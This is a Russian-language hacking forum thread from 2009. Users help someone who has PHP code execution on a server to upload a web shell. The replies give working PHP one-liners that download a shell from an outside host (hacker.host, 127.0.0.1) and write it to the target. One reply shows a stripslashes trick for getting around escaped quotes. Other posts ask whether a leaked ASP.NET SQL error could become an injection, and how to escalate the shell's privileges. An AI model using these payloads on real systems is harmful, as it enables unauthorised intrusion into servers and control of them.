16.09.2009, 07:31
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
|
|
|
16.09.2009, 07:40
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Explоit
Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
wget
|
|
|
|
16.09.2009, 07:41
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
а если его нету в системе? + вырублена функция system(),exex(),passtru()
|
|
|
|
16.09.2009, 15:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз 
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Код:
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
Line 139: forumid = CLng(SafeHTML(Request.QueryString("forumid")))
Line 140: If mode = "edit" Then
Line 141: forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
Line 142: arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
Line 143: If IsArray(arrTheArray) Then
Source File: не скажу :) Line: 141
Stack Trace:
[FormatException: Input string was not in a correct format.]
Microsoft.VisualBasic.CompilerServices.Conversions.ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +178
[InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +714736
ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +115
System.Web.UI.Page.Render(HtmlTextWriter writer) +38
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
|
|
|
|
16.09.2009, 08:42
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
зделать какуюнибудь качалку на пхп, аля :
Код:
<? $data = implode('',file('http://127.0.0.1/shell.txt')); $fp=fopen('./123.php','wb'); fputs($fp,$data); fclose($fp); ?>
|
|
|
|
16.09.2009, 09:54
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами:
9230381
Репутация:
90
|
|
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
|
|
|
|
16.09.2009, 15:22
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
|
|
Сообщение от InFlame
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
Спасибо, люди!
Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.
|
|
|
|
16.09.2009, 16:33
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
спасибо
|
|
|
|
16.09.2009, 16:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
milw0rm.com в помощь |
|
|
|
16.09.2009, 17:24
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
Сообщение от mailbrush
milw0rm.com в помощь вопрос был про повышение прав до пользователя,а не до рута,используя сплоиты с milw0rm.com.
или я не то понял 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
